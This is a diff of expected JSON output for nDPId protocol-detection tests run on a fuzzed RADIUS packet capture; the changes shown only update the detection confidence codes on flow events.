+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":620000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -310,50 +310,50 @@ 00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1528997989461,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997989461,"pkt":"ABRP+4rqcNuYVcUnCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 01319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1528997997929,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":691,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":691,"pkt_l4_len":657,"thread_ts_msec":1528997997929,"pkt":"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"} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1528997998006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528997998006,"pkt":"ABRP+4rqcNuYVcUnCABFAACF2NZAAPwRe0\/G4hk1CgxAHgcVchAAcWngBYYAafOBk\/MbbTEmOF2SETjhcxsBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0"} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775573,"flow_last_seen":1528997775573,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775573,"flow_last_seen":1528997775573,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998009111,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1528998009111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998009111,"pkt":"ABRP+4rqcNuYVcUnCABFAADhCFZAAPsRTHTG4hk1QQxAHgcUchAAzZhiC4cAxfpcYMkIJQAq\/AYDHQwJPKgBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NzgvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjM1T0oBAgBIFwEAAAEFAAD1MaNN\/eVrXVA5NyB7PdAiAgUAAKijzKdTogAAg+UMifaIvECLAQACCQUAAKm646oYz3UcK6LI7VxSaVlQEnCDxzf23chcIFKFSs5a0So="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998009111,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998009111,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998013338,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1528998013338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":671,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":671,"pkt_l4_len":637,"thread_ts_msec":1528998013338,"pkt":"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"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998013338,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998013405,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998013338,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998013405,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1528998226495,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998226495,"pkt":"AAAMB6xAABRP+4rqCABFAALbITxAAP8RAAAKDFIexuIZNXIQBxQCxwAAAYoCv\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"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998226700,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1528998226700,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998226700,"pkt":"AGRP+4rqcNuYVcUnCABFAADhCw9AAPwRSLvG4hk1CgxAQgcUchAAzUSUJQAAxU7iei8YAqXgQzF8ViRYUTYBNTAzMTE0ODAwNzM2UzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997839322,"flow_last_seen":1528998013405,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 